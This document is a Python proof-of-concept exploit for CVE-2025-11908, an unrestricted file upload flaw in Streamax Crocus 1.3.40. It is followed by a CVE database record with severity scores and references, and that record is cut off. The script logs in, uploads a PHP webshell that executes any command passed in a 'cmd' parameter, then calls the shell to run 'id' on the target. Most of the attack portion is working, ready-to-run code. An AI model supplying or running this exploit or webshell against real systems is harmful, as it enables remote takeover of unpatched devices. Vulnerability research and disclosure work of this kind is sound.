CVE-2025-11908

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2025-11908 - Streamax Crocus 1.3.40 Unrestricted File Upload PoC Vulnerability: Unrestricted file upload in /FileDir.do?Action=Upload Author: Security Researcher """ import requests import sys from requests_toolbelt.multipart.encoder import MultipartEncoder TARGET_URL = "http://target-host" UPLOAD_ENDPOINT = "/FileDir.do?Action=Upload" USERNAME = "test" PASSWORD = "test123" # Malicious PHP webshell content disguised as image file WEBSHELL_CONTENT = b"""<?php // Simple PHP webshell for testing purposes echo "Vulnerable: CVE-2025-11908"; if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>""" def login(session, base_url): """Perform login to obtain session cookie""" login_url = f"{base_url}/Login.do" data = { "username": USERNAME, "password": PASSWORD } try: resp = session.post(login_url, data=data, timeout=10) if resp.status_code == 200 and "JSESSIONID" in session.cookies.get_dict(): print("[+] Login successful") return True except Exception as e: print(f"[-] Login failed: {e}") return False def upload_malicious_file(session, base_url, filename="test.php"): """Upload malicious file to vulnerable endpoint""" upload_url = f"{base_url}{UPLOAD_ENDPOINT}" # Construct multipart form data with malicious file multipart_data = MultipartEncoder( fields={ "File": (filename, WEBSHELL_CONTENT, "application/octet-stream"), "Action": "Upload" } ) headers = { "Content-Type": multipart_data.content_type, "User-Agent": "Mozilla/5.0 (compatible; PoC)" } try: resp = session.post(upload_url, data=multipart_data, headers=headers, timeout=10) print(f"[+] Upload response status: {resp.status_code}") print(f"[+] Response body: {resp.text[:500]}") # Check if upload was successful if resp.status_code == 200 and ("success" in resp.text.lower() or "upload" in resp.text.lower()): print(f"[+] File uploaded successfully: {filename}") return True except Exception as e: print(f"[-] Upload failed: {e}") return False def verify_shell(session, base_url, filename="test.php"): """Verify if uploaded webshell is accessible""" shell_url = f"{base_url}/upload/{filename}" try: resp = session.get(shell_url, timeout=10) if resp.status_code == 200: print(f"[+] Webshell accessible at: {shell_url}") # Test command execution cmd_resp = session.get(f"{shell_url}?cmd=id", timeout=10) print(f"[+] Command execution result: {cmd_resp.text}") return True except Exception as e: print(f"[-] Shell verification failed: {e}") return False def main(): if len(sys.argv) > 1: global TARGET_URL TARGET_URL = sys.argv[1] session = requests.Session() print(f"[*] Target: {TARGET_URL}") print(f"[*] Testing CVE-2025-11908 - Unrestricted File Upload") # Step 1: Login if not login(session, TARGET_URL): print("[-] Cannot proceed without valid credentials") sys.exit(1) # Step 2: Upload malicious file if upload_malicious_file(session, TARGET_URL): # Step 3: Verify shell access verify_shell(session, TARGET_URL) else: print("[-] Exploit failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11908", "sourceIdentifier": "[email protected]", "published": "2025-10-17T19:15:36.813", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Shenzhen Ruiming Technology Streamax Crocus 1.3.40. The affected element is the function uploadFile of the file /FileDir.do?Action=Upload. Performing manipulation of the argument File results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:streamax:streamax_crocus:1.3.40:*:*:*:*:*:*:*", "matchCriteriaId": "9BE97623-A1D4-407D-88A8-8E204CFC39D2"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E6%B7%B1%E5%9C%B3%E5%B8%82%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AF%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8Crocus%E7%B3%BB%E7%BB%9F.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328918", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328918", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671391", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/FightingLzn9/vul/blob/main/%E6%B7%B1%E5%9C%B3%E5%B8%82%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AF%E8%82 ... (truncated)